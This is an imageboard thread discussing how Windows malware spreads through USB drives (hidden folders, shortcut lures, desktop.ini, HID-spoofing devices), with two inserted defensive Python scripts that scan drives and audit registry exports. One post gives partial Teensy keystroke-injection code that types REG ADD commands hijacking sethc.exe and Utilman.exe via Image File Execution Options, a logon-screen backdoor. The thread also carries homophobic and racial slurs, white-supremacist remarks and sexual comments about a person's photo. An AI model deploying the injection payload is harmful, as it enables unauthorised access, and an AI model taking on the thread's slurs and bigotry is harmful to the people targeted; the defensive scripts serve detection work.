Malware

How does malware infect a Windows machine through a USB flash drive if you disable autorun?

i'd like to infect her (male) with my malware if you know what i mean ;)

Them's child rearin' hips yew faggot. Learn to women.

That's one hell of a body.

How can you seriously like a shitty anime thats like 30 years old when we write two thousand seventeen. Its getting beyond stale. Can we outlaw manchildren somehow? The future of the white race depends on it.

Loading icons for DLL files in Explorer required loading them and executing Init function. It was fixed since I do not know when.

>Loading icons for DLL files in Explorer required loading them and executing Init function
So part of the malware needs to be a DLL file?
And does that mean to execute the malware you'd need to open the drive?
Wouldn't using another file explorer solve that?

Yes.
Yes.
Most likely not, because icon loading is often borrowed from Win32. Read the last sentence of my previous post.

You need to go back

Also, you can fix this manually by disabling all DLL custom icons.
HKCR/dllfile/DefaultIcon should not contain % signs.

>How does malware infect a Windows machine through a USB flash drive if you disable autorun?
Most people don't disable autorun. When you make malware, you're normally not making it to infect the 1% to 5% of the people who take proactive steps to be secure. You're targeting the 99% to 95% of people who don't.
The exception to this is if you're the CIA or some shit and targeting specific individuals or foreign government systems.

I've read that, but I still find some infected USB flash drives.
Maybe they don't update then?
Nice.
>Most people don't disable autorun
That's true for XP/Vista/Win7, but from Win 8 it should be disabled by default.

You clearly don't belong here.

Someone out there came on this belly.
Literally how can I continue with my life, knowing this?

cute boy~

And I'd like to add to my previous post, that if you are so pathetic as to like Neon Genesis Evangelion in Anno Domini 2000 and fucking 17, then liking any of those positively retarded girls - Asuka or the blue headed one - is barely better than being a literal horsefucker. The only one which is *maybe* acceptable for a well-adjusted adult is that purple haired milf.

The usb stick can pretend to be whatever device, or even multiple ones at the same time. Like a keyboard and mouse that automatically do a sequence of key presses and mouse clicks when plugged in.

>Maybe they don't update then?
This and autorun and

that fucking malware which replaces folders with executables with same names and hides folders (with hidden attribute). After flash drive goes through one XP machine with nothing secure, it's enough to click any of those, even on 7 probably.

This.

Hand over the sauce now

That's assuming the USB flash drive spoofs HID ID, which is on firmware level.
And in that case OS doesn't really matter at this point, unless you use OS that doesn't support USB HID.

If this is a girl then I'd fuck the shit out of her. If this is a boy then I'd fuck the shit out of him

>malware which replaces folders with executables with same names and hides folders
That's clever, since many people don't enable "Show extension for known file types".
So if a machine has autorun disabled, and you've noticed the swap and didn't run the malware, you'd be safe?
I also assume the original folders won't be simply hidden, it might even be system attribute added to it.

wtf i am a faggot now

>So if a machine has autorun disabled, and you've noticed the swap and didn't run the malware, you'd be safe?
Windows is a shitload of legacy code. You are never safe until proven so.
There was no indication of DLL icon vulnerability since almost all DLLs had same icons built in and nobody thought that windows could be calling DLL to get icon.
>I also assume the original folders won't be simply hidden,
Properties->Hidden

Give me the salsa m80

THIS.
I have an old XP machine that I use to control a waterjet cutter.
Many customers come in with USB flash drives infected with various malware.
However I discovered that windows might have a new way to set the hidden attribute.
Since the folder icon was changed to that of a volume, and can't be unhidden.
I had to delete it.

It doesn't.

>Liking biological females is almost as bad as wanting to fuck a horse
Here's your (you).

>Completely retarded moetron which indeed started the retard-moe trend 10 years before it became a thing
>Even more retarded obnoxious tsunderetron which started the obnoxious baka-baka-baka tsundere trend 10 years before it became a thing
>Also 2d anime characters
>biological females

(((((((((((((((((((((((((((((((((((Thats bait)))))))))))))))))))))))))))))))

Don't post OP images that are more interesting than your topic

>fapping to male asuka
faggots go fap to kawaru

p-please be a trap

Kys my man

Driver Hijack.

Autorun got replaced with redirects in early 2013.

>redirects in early 2013
Example?

>Infected PC creates shortcuts for all files, and makes a hidden folder with a blank filename that will store the original files and an executable file/installer
>Shortcuts open the malware installer disguised as the device drivers and the original file
>90% of people never notice their USB is infected

I understood the first part but why device driver?

So the malware can be executed without having to deal with UAC.

I see, in that case the best way to protect yourself from that is to check file extensions and disable autorun?

Pretty much.
You should be able to rescue the USB and get rid of the malware easily anyway; all you need are 2 commands.

It's common sense to always check what you are running.

The best way to save yourself is to
install gentoo
You wouldn't go to sleep with your head inside a guillotine, would you?

>2 commands
del and attrib ?

>run Linux
>never need to worry about this shit

Isn't Linux susceptible to autorun viruses, especially if you have WINE installed?

Many distros auto mount flash drives but don't autorun

What's the difference?

Mounting just means it's accessible to the root filesystem for reading and writing

So opening the mounted volume with explorer doesn't execute the malware even if you have WINE installed?

It might
Wine definitely introduces vulnerabilities

>what is potatoshop

If I remember correctly all the files are hidden in a system permission folder with filename that is alt+0160/NBSP character that is like space [ ] but actually not similar. It won't delete files because that would trigger UAC. Just hides it and infects every shit it can.
noobs are baited to click the dummy shortcuts.lnk files which will:
open the malware and infect the local pc
open the shortcut to the folder or file so it won't be suspicious
The problem is when people try to copy/download that shortcut which isn't the actual file.

The malware sometimes just points to a native system32 command that will parse a binary that is hidden in the flash drive OR some garbled text file that is encoded to some shit to avoid detection.

Easy fix is to make a file with alt+0160 and give it a system permission so the virus wouldn't be able to hide your files (like the autorun.inf folder hacky fix)

there's another one which utilizes desktop.ini
it would:
>read the icon
>that is actually a malware
>no user intervention/autorun required, infected the moment you plug it in
it's very rare virus though but really clever
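
Added example, not part of any post in this thread: a Python triage pass over a mounted drive for the artifacts described above (shortcut lures, a folder named only with Alt+0160/NBSP, executables named after a sibling folder, and autorun.inf/desktop.ini files). The extension list and finding labels are assumptions, and hits are leads to review rather than verdicts.

```python
"""Triage a mounted removable volume for shortcut/hidden-folder artifacts."""
import os
import sys

# Assumed list of directly runnable extensions used as folder look-alikes.
LURE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".wsf"}
BLANK_CHARS = " \u00a0\t"  # ASCII space, NBSP (Alt+0160), tab
SHELL_CONFIG = {"autorun.inf", "desktop.ini"}


def scan_volume(root):
    """Return a sorted list of (finding, relative_path) tuples for `root`."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        sibling_dirs = {d.lower() for d in dirnames}
        for d in dirnames:
            # A folder whose name is nothing but blanks is where originals get stashed.
            if d.strip(BLANK_CHARS) == "":
                findings.append(("blank-named-folder", os.path.normpath(os.path.join(rel, d))))
        for f in filenames:
            stem, ext = os.path.splitext(f.lower())
            path = os.path.normpath(os.path.join(rel, f))
            if ext == ".lnk":
                # Shortcuts on removable media are unusual; inspect their targets.
                findings.append(("shortcut", path))
            elif ext in LURE_EXTS and stem in sibling_dirs:
                # Executable posing as the folder of the same name next to it.
                findings.append(("exe-named-like-folder", path))
            elif f.lower() in SHELL_CONFIG:
                findings.append(("shell-config-file", path))
    return sorted(findings)


if __name__ == "__main__" and len(sys.argv) > 1:
    for finding, path in scan_volume(sys.argv[1]):
        print(f"{finding:24} {path!r}")
```

Run it against the mount point from an OS that does not honour the Windows hidden/system attributes, so the stashed folders are listed like any other entry.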

cute belly

>desktop.ini
That's genius.
GNU/Linux utilizes .ini files as well, does that make it vulnerable?

Same malware prevents showing hidden files in Explorer.

Memes aside, is that a girl or a girl(female)?

>people in this thread say its a guy

[spoiler] it only makes me harder [/spoiler]

Based on the hips and the accuracy of the photo, I would say this is a woman. Usually when the hips are gimped there's some level inaccuracy with the vertical lines. I've highlighted some key lines in gimp here to emphasize the correctness. The only concern here is a rather large, uniform white spot around the hip that could indicate error correction. It's still somewhat up in the air, but my vote is female.

>no penis

Dropped

Wow.

Could we stop USB HID software by presenting a prompt when a "keyboard" is plugged in? Like a captcha to prove you're real human bean, so that if it starts typing bullshit, the PC will know this nigga ain't a real keyboard.

You should go to the Facebook Linux Memes group. You'd get along great over there.

Again Sup Forums can't into the humans

It isn't that autorun is the most dangerous, but it is the easiest that retards can do to get files into a network. The user is going to run the malware they bring in. USB is a nice target since it avoids all email, firewall (read website filtering) and the false sense of security that it came from my machine at home.

inb4 you can do X. We are talking about users who can't common sense 2017

off yourself my dude

WHERES THE FUCKING SOURCE

I feel sorry for your mother.

I'd ssh into her MySQL server if you know what I mean.

something not done to this image

you mean give her a hot SQL Injection?

>this thread
Remember when you didn't have to assume every womanlike figure was some kind of trap or freak? I hate this timeline. I want to go back.

Back to Argentina with you

same way that your pic is a trap

Finally. I've been wondering how these shitty desktop.ini files were related to persistence. The flavour I've been dealing with uses bogus System Volume Information folders, too.

WHO IS OP'S SEMEN DEMON

>dont like my retard imaginary girlfriend
>written by infamous hack
Hideaki Anno
>GET OFF MY BOARD

>>Sup Forums
>>/1990s/

This user gets it. I use a teensy sometimes on physical pen tests because they're so cheap.

#define TEENSY3
#ifdef TEENSY2
#include
#endif

#define REG_Sethc "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"\" /f"
#define REG_Utilman "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Utilman.exe\" /v Debugger /t REG_SZ /d \"\" /f"

void setup(){
delay(3000);
wait_for_drivers(2000);

minimise_windows();
delay(500);
while(!cmd_admin(3,500))
{
reset_windows_desktop(2000);
}
Keyboard.println(REG_Sethc);
delay(3000);
Keyboard.println(REG_Utilman);
delay(2000);
Keyboard.println("exit");

}

void loop() {

}

void wait_for_drivers(int sleep)
{
bool CapsLockTrap = is_caps_on();
while(CapsLockTrap == is_caps_on())
{
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
delay(sleep);
}
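
Added example, not part of the post above and not the poster's code: the sketch above types `REG ADD` commands that set a `Debugger` value under `Image File Execution Options` for `sethc.exe` and `Utilman.exe`, so a defender can audit a registry export for exactly that. The sample export, its placeholder paths, the severity labels and the extra accessibility binaries in the watch list are assumptions.

```python
"""Flag IFEO Debugger values in the text of a .reg export."""
import re

IFEO_MARKER = "\\currentversion\\image file execution options\\"
# sethc.exe and Utilman.exe come from the page; the rest are other
# accessibility tools reachable from the logon screen (added here).
LOGON_SCREEN_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                         "narrator.exe", "displayswitch.exe", "atbroker.exe"}
DEBUGGER_RE = re.compile(r'^"Debugger"="(.*)"$', re.IGNORECASE)


def find_ifeo_debuggers(reg_text):
    """Return (image, debugger, severity) for each IFEO Debugger value."""
    hits, image = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            pos = key.lower().find(IFEO_MARKER)
            # Keep only the image name directly below the IFEO key.
            image = key[pos + len(IFEO_MARKER):].split("\\")[0] if pos != -1 else None
            continue
        match = DEBUGGER_RE.match(line)
        if image and match:
            debugger = match.group(1).replace('\\"', '"').replace("\\\\", "\\")
            # Some admin tools set Debugger legitimately, hence "review".
            severity = "high" if image.lower() in LOGON_SCREEN_BINARIES else "review"
            hits.append((image, debugger, severity))
    return hits


# Constructed sample export; decode real exports (often UTF-16) before parsing.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\constructed\\placeholder.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe]
"Debugger"="C:\\constructed\\placeholder.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\constructed\\procexp.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000000
'''

if __name__ == "__main__":
    for image, debugger, severity in find_ifeo_debuggers(SAMPLE_REG):
        print(f"{severity:6} {image:14} -> {debugger}")
```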

The fuck kind of argument is "like 30 years old"? Are you going to call Shakespeare a hack next?

Other than those.
The hidden files/folder doesn't appear when plugging the infected flash drive into Linux.

>OS that doesn't support USB HID
Like what?

>common sense 2017
What do you recommend?
Hot gluing every USB port isn't an option, and sometimes you need to lend USB flash drive to someone.

>desktop.ini files
I've opened one of these and there was only gibberish in there.
>System Volume Information folders
That and RECYCLE as well.

Source of this Asuka pls

HURR DURR Y U NO LIEK WAT I LIEK

are you seriously calling people pathetic, and in the same post casting your vote on who you'd fuck from an anime?

who is that
source please

Symbian.

WHERE IS THE SAUCE?!

>desktop.ini
I thought that affects folder appearance when you open that folder.
Autorun.inf does the icon change thing.

Who is this woman

It's a dude

Who is this Slime Slurper?

Searching the image didn't give me results, OP. I beg for your source. Also is this a girl (female) or a girl (male)?

Who is this dude?

it's not a dude for fucks sakes, it's a beatiful woman

It's ok if you think guys are beautiful.
There's nothing weird about that these days.

Teensy + shell code payload

Something like McAfee device control can lock down all the USBs. Have a process through IT if you really need to use a USB.

>"Good afternoon, IT guy, I have this USB flash drive can you see if it's safe?"
>*show generous amount of cleavage as a motivation*
>3 hours later, the USB flash drive is missing the IT room smells like squid

what can I say. I like putting USBs in my ass and rocketing them out so I can hear the "ting" as it hits the side toilet.

>"male semen"